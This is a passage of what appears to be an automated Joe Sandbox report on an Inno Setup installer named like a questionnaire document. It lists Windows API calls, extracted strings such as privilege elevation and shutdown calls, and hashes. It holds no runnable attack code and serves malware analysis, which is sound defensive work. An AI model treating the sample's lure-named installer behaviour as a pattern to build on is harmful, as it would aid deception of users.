                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 00405873
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: Virtual$Free$Query
                                                                                              • String ID:
                                                                                              • API String ID: 778034434-0
                                                                                              • Opcode ID: 9cf1a0e01308b3a939f0f8b7cd504775b3f588773c4986be2e6cc2d25f9c1fa1
                                                                                              • Instruction ID: 84a00d9712422ee72978a24a1d80a8d623c3a2aa13178c9074bfc96ea9226af9
                                                                                              • Opcode Fuzzy Hash: 9cf1a0e01308b3a939f0f8b7cd504775b3f588773c4986be2e6cc2d25f9c1fa1
                                                                                              • Instruction Fuzzy Hash: B8F08135704A009FD310EB2AC945B27B7E5EFC9750F19C17AE9889B3A0E635DC118B96
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 006257BC
                                                                                              • QueryPerformanceCounter.KERNEL32(00000000,00000000,00625A4F,?,?,00000000,00000000,?,0062644E,?,00000000,00000000), ref: 006257C5
                                                                                              • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 006257CF
                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,00625A4F,?,?,00000000,00000000,?,0062644E,?,00000000,00000000), ref: 006257D8
                                                                                              • CreateNamedPipeW.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 0062584E
                                                                                              • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 0062585C
                                                                                              • CreateFileW.KERNEL32(00000000,C0000000,00000000,006CD098,00000003,00000000,00000000,00000000,00625A0B,?,00000000,40080003,00000006,00000001,00002000,00002000), ref: 006258A4
                                                                                              • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,006259FA,?,00000000,C0000000,00000000,006CD098,00000003,00000000,00000000,00000000,00625A0B), ref: 006258DD
                                                                                                • Part of subcall function 005C745C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C746F
                                                                                              • CreateProcessW.KERNEL32 ref: 00625986
                                                                                              • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,000000FF,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 006259BC
                                                                                              • CloseHandle.KERNEL32(000000FF,00625A01,?,00000000,00000000,000000FF,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 006259F4
                                                                                                • Part of subcall function 0060CE84: GetLastError.KERNEL32(00000000,0060DBAA,00000005,00000000,0060DBD2,?,?,006D579C,?,00000000,00000000,00000000,?,006B910F,00000000,006B912A), ref: 0060CE87
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                              • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                              • API String ID: 770386003-3271284199
                                                                                              • Opcode ID: 4b38d71f613c2805a895e8b5dd9c39005fd96be071beebf230027e2823365f0d
                                                                                              • Instruction ID: 34d3d620ae4a6a58b4d890a55742d975a8112a0372845dc610fa96f79e58b5cb
                                                                                              • Opcode Fuzzy Hash: 4b38d71f613c2805a895e8b5dd9c39005fd96be071beebf230027e2823365f0d
                                                                                              • Instruction Fuzzy Hash: 21717F70E407589EDB20EFB9DC46B9EBBB6EF09304F1041A9F509EB282D77499408F65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 006A5F04: GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F30
                                                                                                • Part of subcall function 006A5F04: GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F49
                                                                                                • Part of subcall function 006A5F04: CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F73
                                                                                                • Part of subcall function 006A5F04: CloseHandle.KERNEL32(00000000), ref: 006A5F91
                                                                                                • Part of subcall function 006A6014: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,006A60A5,?,00000097,00000000,?,006A611F,00000000,006A6237,?,?,00000001), ref: 006A6043
                                                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 006A616F
                                                                                              • GetLastError.KERNEL32(00000000,006A6237,?,?,00000001), ref: 006A6178
                                                                                              • MsgWaitForMultipleObjects.USER32 ref: 006A61C5
                                                                                              • GetExitCodeProcess.KERNEL32 ref: 006A61EB
                                                                                              • CloseHandle.KERNEL32(00000000,006A621C,00000000,00000000,000000FF,000004FF,00000000,006A6215,?,00000000,006A6237,?,?,00000001), ref: 006A620F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: Handle$CloseFile$AttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcessShellWait
                                                                                              • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                              • API String ID: 254331816-221126205
                                                                                              • Opcode ID: 2609ea7e346f2b00e944a6579133f7cd7ad2ab1e7388d4ed423ae0c2cc39ebae
                                                                                              • Instruction ID: 3b593d6e4f6188ec2893085c4d8bc70e2010c955c7988aee54b7ca20d83eebf0
                                                                                              • Opcode Fuzzy Hash: 2609ea7e346f2b00e944a6579133f7cd7ad2ab1e7388d4ed423ae0c2cc39ebae
                                                                                              • Instruction Fuzzy Hash: 4931AF70A00208AFDB10FFE9C842A9DBABAEF06314F44053DF514E62D2D7789E448F29
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,0041CF90,?,?), ref: 0040E0F1
                                                                                              • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040E102
                                                                                              • FindFirstFileW.KERNEL32(?,?,kernel32.dll,0041CF90,?,?), ref: 0040E202
                                                                                              • FindClose.KERNEL32(?,?,?,kernel32.dll,0041CF90,?,?), ref: 0040E214
                                                                                              • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,0041CF90,?,?), ref: 0040E220
                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,0041CF90,?,?), ref: 0040E265
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                              • String ID: GetLongPathNameW$\$kernel32.dll
                                                                                              • API String ID: 1930782624-3908791685
                                                                                              • Opcode ID: 1e5aa63ad13805ebe641060d55f71927a25656d4bbeb27d65059da7d04647448
                                                                                              • Instruction ID: 85f15f90104044dde56611b048d4fe37091be9da2e2d426f5e1dee482ffdf80d
                                                                                              • Opcode Fuzzy Hash: 1e5aa63ad13805ebe641060d55f71927a25656d4bbeb27d65059da7d04647448
                                                                                              • Instruction Fuzzy Hash: 09418471E005189BCB10DAA6CC85ADEB3B9EF44310F1449FAD504F72C1EB789E568F89
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000028), ref: 0060F6E8
                                                                                              • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0060F6EE
                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 0060F707
                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0060F72E
                                                                                              • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0060F733
                                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 0060F744
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                              • String ID: SeShutdownPrivilege
                                                                                              • API String ID: 107509674-3733053543
                                                                                              • Opcode ID: 587dd988ce63d715a201a3aa16ee9d515860b21273bb1684cbadb229f2035bc1
                                                                                              • Instruction ID: 06ed2f01938c74524bf5f5b14376f39d724559be6214a1270456cb597724f4e2
                                                                                              • Opcode Fuzzy Hash: 587dd988ce63d715a201a3aa16ee9d515860b21273bb1684cbadb229f2035bc1
                                                                                              • Instruction Fuzzy Hash: 8EF090306E430276E624AF719C47FEB218D9B40B09F50092DF644D61C1DBA9E589826B
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • IsIconic.USER32(?), ref: 006A6913
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 006A6930
                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 006A6955
                                                                                                • Part of subcall function 005ABC0C: IsWindow.USER32(8B565300), ref: 005ABC1A
                                                                                                • Part of subcall function 005ABC0C: EnableWindow.USER32(8B565300,000000FF), ref: 005ABC29
                                                                                              • GetActiveWindow.USER32 ref: 006A6A34
                                                                                              • SetActiveWindow.USER32(00000005,006A6A9E,006A6AB4,?,?,000000EC,?,000000F0,00000000,006A6ACD,?,00000000,?,00000000), ref: 006A6A87
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: Window$ActiveLong$EnableIconic
                                                                                              • String ID: `
                                                                                              • API String ID: 4222481217-2679148245
                                                                                              • Opcode ID: bbb381b8fbc4d8b387cdcd93e1fcf562f63046ab1121e3482b0235a5bbb07c6f
                                                                                              • Instruction ID: 936cf99dd23b6ce25ef8ab77046748165037aff960be166beb91cb3f54ae6a19
                                                                                              • Opcode Fuzzy Hash: bbb381b8fbc4d8b387cdcd93e1fcf562f63046ab1121e3482b0235a5bbb07c6f
                                                                                              • Instruction Fuzzy Hash: C3611875A002099FDB00EFA9C885A9EBBF6FB4A304F598469F914EB361D734AD41CF50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,006B8F21,?,006D579C,?,?,006B90D6,00000000,006B912A,?,00000000,00000000,00000000), ref: 006B8E35
                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000010), ref: 006B8EB8
                                                                                              • FindNextFileW.KERNEL32(000000FF,?,00000000,006B8EF4,?,00000000,?,00000000,006B8F21,?,006D579C,?,?,006B90D6,00000000,006B912A), ref: 006B8ED0
                                                                                              • FindClose.KERNEL32(000000FF,006B8EFB,006B8EF4,?,00000000,?,00000000,006B8F21,?,006D579C,?,?,006B90D6,00000000,006B912A), ref: 006B8EEE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: FileFind$AttributesCloseFirstNext
                                                                                              • String ID: isRS-$isRS-???.tmp
                                                                                              • API String ID: 134685335-3422211394
                                                                                              • Opcode ID: 564da655028b6ed245dcf1fd0bed3210c4fc5dfb2d076a09498ef35282640a75
                                                                                              • Instruction ID: d39c6702953267373b2098697dd7c4daff6c19a754f4e73b98016d5d2bb0ed42
                                                                                              • Opcode Fuzzy Hash: 564da655028b6ed245dcf1fd0bed3210c4fc5dfb2d076a09498ef35282640a75
                                                                                              • Instruction Fuzzy Hash: E6317670A006189FDB10DF65DC45ADEB7BEEB84304F5145FAE804A3291EB389E81CB58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • IsIconic.USER32(?), ref: 005C90F9
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 005C9116
                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 005C913B
                                                                                              • GetActiveWindow.USER32 ref: 005C9149
                                                                                              • MessageBoxW.USER32(00000000,00000000,?,000000E5), ref: 005C9176
                                                                                              • SetActiveWindow.USER32(00000000,005C91A4,?,000000EC,?,000000F0,?,00000000,005C91DA,?,?,00000000), ref: 005C9197
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: Window$ActiveLong$IconicMessage
                                                                                              • String ID:
                                                                                              • API String ID: 1633107849-0
                                                                                              • Opcode ID: 8e29fb634f2bd42e54d76323cdfd72ae6654eabf5b00baf4e96ba8bdb3ccec15
                                                                                              • Instruction ID: 0eaebbc0e28104152e09dfddf635ce6469108de93c670a6b66e2a7222b47ea08
                                                                                              • Opcode Fuzzy Hash: 8e29fb634f2bd42e54d76323cdfd72ae6654eabf5b00baf4e96ba8bdb3ccec15
                                                                                              • Instruction Fuzzy Hash: 4F319375A04605AFDB00EFA9DD4AF9A7BF9FB89350B1544A9F400D73A1DB34AD00DB14
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetVersion.KERNEL32(00000000,0062D04E,?,00000000,00000000,?,0062D064,?,0068E013), ref: 0062CFD5
                                                                                              • CoCreateInstance.OLE32(006CD0C4,00000000,00000001,006CD0D4,00000000,00000000,0062D04E,?,00000000,00000000,?,0062D064,?,0068E013), ref: 0062CFFB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: CreateInstanceVersion
                                                                                              • String ID:
                                                                                              • API String ID: 1462612201-0
                                                                                              • Opcode ID: cbb049565a1867f24a50483da30d8e7f142d0e73d3a7e9700637a94f81e4e663
                                                                                              • Instruction ID: 9475dfad4fa877b1df6a840545b6a6068a8d92e7f1f871649489f85859f50de3
                                                                                              • Opcode Fuzzy Hash: cbb049565a1867f24a50483da30d8e7f142d0e73d3a7e9700637a94f81e4e663
                                                                                              • Instruction Fuzzy Hash: F511D231648A04AFEB10EF69ED4AF5A77EEEB45308F4214BAF400D7AA1C775AD10CB15
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • InitializeSecurityDescriptor.ADVAPI32(00000001,00000001), ref: 005C8B49
                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(00000000,000000FF,00000000,00000000,00000001,00000001), ref: 005C8B59
                                                                                                • Part of subcall function 00413E90: CreateMutexW.KERNEL32(?,00000001,00000000,?,006B91D7,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,006B94FD,?,?,00000000), ref: 00413EA6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: DescriptorSecurity$CreateDaclInitializeMutex
                                                                                              • String ID:
                                                                                              • API String ID: 3525989157-0
                                                                                              • Opcode ID: 8c33769221f5c02fb9acf0c53c91398d8a51c8b1cb76e2f494f5bcae13adf59b
                                                                                              • Instruction ID: 330012b0c6753e8d8900aa9d7e53afb48d76169d5e03c13c529c7fe63a2e2798
                                                                                              • Opcode Fuzzy Hash: 8c33769221f5c02fb9acf0c53c91398d8a51c8b1cb76e2f494f5bcae13adf59b
                                                                                              • Instruction Fuzzy Hash: E9E092B16443006FE700DFB58C86F9B77DC9B84725F104A2EB664DB2C1E778DA48879A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ShowWindow.USER32(?,00000005,00000000,006B94FD,?,?,00000000,?,00000000,00000000,?,006B99DE,00000000,006B99E8,?,00000000), ref: 006B91BF
                                                                                              • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,006B94FD,?,?,00000000,?,00000000,00000000), ref: 006B91E5
                                                                                              • MsgWaitForMultipleObjects.USER32 ref: 006B9206
                                                                                              • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,006B94FD,?,?,00000000,?,00000000), ref: 006B921B
                                                                                                • Part of subcall function 005C6FB0: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,005C7045,?,?,?,00000001,?,0061037E,00000000,006103E9), ref: 005C6FE5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ShowWindow$FileModuleMultipleNameObjectsWait
                                                                                              • String ID: (\m$.lst$.msg$/REG$/REGU$<`m$Inno-Setup-RegSvr-Mutex$Setup
                                                                                              • API String ID: 66301061-906243933
                                                                                              • Opcode ID: 078cf02edb1222c4bc64e21194ae756c0ceff5465f997aaa320c40601d4a08a6
                                                                                              • Instruction ID: 4d26cb6eac5053f9cdac576eea358071a92945d2d4b93ba07426bed60c59251a
                                                                                              • Opcode Fuzzy Hash: 078cf02edb1222c4bc64e21194ae756c0ceff5465f997aaa320c40601d4a08a6
                                                                                              • Instruction Fuzzy Hash: 9B91D5B0A042059FDB10EBA4D856FEEBBF6FB49304F514469F600A7381DA79AD81CB74
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CloseHandle.KERNEL32(?), ref: 00625D4B
                                                                                              • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00625D67
                                                                                              • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00625D75
                                                                                              • GetExitCodeProcess.KERNEL32 ref: 00625D86
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00625DCD
                                                                                              • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00625DE9
                                                                                              Strings
                                                                                              • Stopping 64-bit helper process. (PID: %u), xrefs: 00625D3D
                                                                                              • Helper process exited with failure code: 0x%x, xrefs: 00625DB3
                                                                                              • Helper process exited, but failed to get exit code., xrefs: 00625DBF
                                                                                              • Helper isn't responding; killing it., xrefs: 00625D57
                                                                                              • Helper process exited., xrefs: 00625D95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                              • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                              • API String ID: 3355656108-1243109208
                                                                                              • Opcode ID: 8d6c89499cf1bf81312fa230767d1d7ef722e42560ff29e95753671f007f5a00
                                                                                              • Instruction ID: d564c8b30f574b505304bc0216fad519ef2dd9895e072bde183416e8b9fa8f35
                                                                                              • Opcode Fuzzy Hash: 8d6c89499cf1bf81312fa230767d1d7ef722e42560ff29e95753671f007f5a00
                                                                                              • Instruction Fuzzy Hash: 9C21AF70604F50AAD330EB78E44578BBBE69F08310F048C2DB59BC7682D734E8808B5A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0060D3B4: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4A1
                                                                                                • Part of subcall function 0060D3B4: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4B1
                                                                                              • CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,006B75FA), ref: 006B748F
                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000000,00000000,00000000,006B75FA), ref: 006B74B6
                                                                                              • SetWindowLongW.USER32 ref: 006B74F0
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B75C3,?,?,000000FC,006B6AB0,00000000,?,00000000), ref: 006B7525
                                                                                              • MsgWaitForMultipleObjects.USER32 ref: 006B7599
                                                                                              • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B75C3,?,?,000000FC,006B6AB0,00000000), ref: 006B75A7
                                                                                                • Part of subcall function 0060D8B0: WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0060D996
                                                                                              • DestroyWindow.USER32(?,006B75CA,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B75C3,?,?,000000FC,006B6AB0,00000000,?), ref: 006B75BD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWindow$CloseHandle$AttributesCopyCreateDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                              • String ID: (\m$/SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                              • API String ID: 1779715363-1630723103
                                                                                              • Opcode ID: 26cf6587e7bf8b1553ca1d5cbf9fdcd1103d68e801311e3200c35554a7ed760e
                                                                                              • Instruction ID: ef81c38150d0c0f6437f901880bd06975f11695bff6d213fe2789ed19ae6d402
                                                                                              • Opcode Fuzzy Hash: 26cf6587e7bf8b1553ca1d5cbf9fdcd1103d68e801311e3200c35554a7ed760e
                                                                                              • Instruction Fuzzy Hash: EE4181B1A04208AFDB00EFB5DC56EDE7BF9EB89314F11456AF500F7291DB789A408B64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateEventW.KERNEL32(00000000,000000FF,00000000,00000000,00000000,006261A7,?,00000000,00626202,?,?,00000000,00000000), ref: 00626021
                                                                                              • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,00000000,?,00000000,0062613C,?,00000000,000000FF,00000000,00000000,00000000,006261A7), ref: 0062607E
                                                                                              • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,00000000,?,00000000,0062613C,?,00000000,000000FF,00000000,00000000,00000000,006261A7), ref: 0062608B
                                                                                              • MsgWaitForMultipleObjects.USER32 ref: 006260D7
                                                                                              • GetOverlappedResult.KERNEL32(?,?,00000000,000000FF,00626115,00000000,00000000), ref: 00626101
                                                                                              • GetLastError.KERNEL32(?,?,00000000,000000FF,00626115,00000000,00000000), ref: 00626108
                                                                                                • Part of subcall function 0060CE84: GetLastError.KERNEL32(00000000,0060DBAA,00000005,00000000,0060DBD2,?,?,006D579C,?,00000000,00000000,00000000,?,006B910F,00000000,006B912A), ref: 0060CE87
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                              • String ID: CreateEvent$TransactNamedPipe
                                                                                              • API String ID: 2182916169-3012584893
                                                                                              • Opcode ID: a06eff76c2156a534d1e4dc483291fabc8641127e113913af401bd78cfb4e81c
                                                                                              • Instruction ID: 6106728f610c95dcbec9252819f2c5c1e9fccb50d9899b4423df3e52f48f78ac
                                                                                              • Opcode Fuzzy Hash: a06eff76c2156a534d1e4dc483291fabc8641127e113913af401bd78cfb4e81c
                                                                                              • Instruction Fuzzy Hash: 6441AC70A00618EFDB05DF99DD85EDEBBBAEB08310F1041A9F904E7392D674AE50CB24
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • EnterCriticalSection.KERNEL32(006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000,00000000), ref: 0040DFAE
                                                                                              • LeaveCriticalSection.KERNEL32(006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000), ref: 0040DFD2
                                                                                              • LeaveCriticalSection.KERNEL32(006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000), ref: 0040DFE1
                                                                                              • IsValidLocale.KERNEL32(00000000,00000002,006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040DFF3
                                                                                              • EnterCriticalSection.KERNEL32(006D1C14,00000000,00000002,006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040E050
                                                                                              • LeaveCriticalSection.KERNEL32(006D1C14,006D1C14,00000000,00000002,006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040E079
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                                                              • String ID: en-US,en,
                                                                                              • API String ID: 975949045-3579323720
                                                                                              • Opcode ID: 171b762d311100d548245b05869de6cc58e31fb58a3f3531ab4430e822a5ac23
                                                                                              • Instruction ID: 7d1429daecdd90a797f7fba0e37e49eac4d41b909b59f49409e6443efac98480
                                                                                              • Opcode Fuzzy Hash: 171b762d311100d548245b05869de6cc58e31fb58a3f3531ab4430e822a5ac23
                                                                                              • Instruction Fuzzy Hash: F7218A60B90614A6DB10B7B78C0265A3245DB46708F51487BB540BF3C7CAFD8D558AAF
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C801B
                                                                                                • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                                              • RegCloseKey.ADVAPI32(00000001,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C806E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
